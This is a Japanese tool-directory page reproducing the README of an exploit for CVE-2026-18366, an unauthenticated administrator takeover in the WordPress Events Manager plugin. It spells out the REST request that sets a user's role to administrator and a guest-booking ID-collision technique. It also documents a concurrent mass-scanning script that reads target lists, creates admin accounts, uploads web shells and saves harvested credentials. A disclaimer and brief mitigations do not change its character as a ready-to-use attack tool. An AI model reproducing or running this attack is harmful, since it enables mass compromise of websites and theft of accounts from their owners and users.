Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - 未認証の管理者への権限昇格 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-18366
特権昇格ウェブ脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ポストエクスプロイト
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - 未認証の管理者への権限昇格

リポジトリを見る
1124日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-18366

Events Manager < 7.4.1 - 未認証ユーザーによる管理者権限への権限昇格

CVE CVSS WordPress

Typing SVG


🔗 最新情報

Telegram

最新のゼロデイ、エクスプロイト、セキュリティ研究をお届けします

Telegram Channel


📋 脆弱性の概要


🔍 技術的説明

根本原因の分析

この脆弱性は classes/em-archetypes.php 内の EM\Archetypes::map_meta_cap に存在します。このプラグインは権限マッピングのスコープを不適切に設定しているため、以下の問題が発生します:

  1. 任意のオブジェクトIDを投稿IDとして扱う
  2. 投稿が event または location のカスタム投稿タイプ(CPT)の場合、$caps = [] にリセットされる
  3. edit_user、delete_user、promote_user の権限が再設定されることはない
  4. 権限が空 → has_cap() が true を返す(ユーザー0=ゲストも含む)

攻撃ベクトル

root@kitploit:~
POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

条件: {id} が、イベントまたはロケーションCPTの wp_posts.ID と一致する必要があります。

⚠️ 未認証のRESTアクセスにはnonceは不要です(ログインCookieなし)。

ゲスト予約の悪用

ゲスト予約(デフォルトで dbem_bookings_anonymous=1)は実際のWPユーザーを作成するため、ID衝突の強制が可能になります。予約nonceはイベントフォーム上で公開されています。


🚀 使用方法

必要条件

root@kitploit:~
pip install aiohttp

クイックスタート

root@kitploit:~
python CVE-2026-18366.py

スクリプトは次の項目を入力するよう求めます:

  • list → ターゲットリストファイルへのパス(デフォルト: list.txt)
  • speed → 同時実行ワーカー数(デフォルト: 10)

コマンドラインオプション

root@kitploit:~
python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
オプション説明
-l, --listターゲットURLを含むファイルへのパス
-s, --speed同時実行ワーカー数(1〜200)
--timeoutリクエストのタイムアウト秒数(デフォルト: 20)

ターゲットリストの形式

list.txt ファイルに1行につき1つのターゲットを記述します:

root@kitploit:~
https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 出力

コンソール出力

root@kitploit:~
[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

結果ファイル

攻撃に成功した結果は adminS.txt に保存されます:

root@kitploit:~
https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 エクスプロイトのワークフロー

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ 機能

  • 非同期アーキテクチャ → 高性能な並行スキャン
  • 二重の攻撃経路 → ID衝突+ゲスト予約の悪用
  • 自動シェルアップロード → プラグイン/テーマへのウェブシェル展開
  • バージョン検出 → 脆弱性のあるバージョンの自動識別
  • スマートなユーザー名列挙 → 複数の列挙テクニック
  • ログイン検証 → Cookie+XML-RPCによる検証
  • 権限昇格 → 管理者への自動昇格

📁 ファイル構成

root@kitploit:~
├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ 免責事項

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║                                                                  ║
║  • Only use on systems you own or have explicit permission      ║
║  • Unauthorized access to computer systems is ILLEGAL           ║
║  • The author is NOT responsible for any misuse or damage       ║
║  • By using this tool, you agree to these terms                 ║
║                                                                  ║
║  Use responsibly. Stay ethical. Respect the law.                ║
║                                                                  ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ 対策

WordPress管理者の方は以下の対策を実施してください:

  1. 更新:Events Managerをバージョン 7.4.1 以降にアップデートする
  2. 監査:ユーザーアカウントに不正な変更がないか監査する
  3. 確認:不審なREST APIアクティビティがないかアクセスログを確認する
  4. 実装:悪意のあるリクエストをフィルタリングするWAFルールを実装する

👤 作者

Nxploited (Khaled Alenzi)

Telegram


セキュリティ研究 • 倫理的ハッキング • ゼロデイ発見

ツールをダウンロード
属性詳細
CVE IDCVE-2026-18366
重要度🔴 CRITICAL (CVSS 9.8)
プラグインEvents Manager for WordPress
影響を受けるバージョン< 7.4.1
脆弱性の種類未認証の権限昇格
攻撃経路ネットワーク
認証要件なし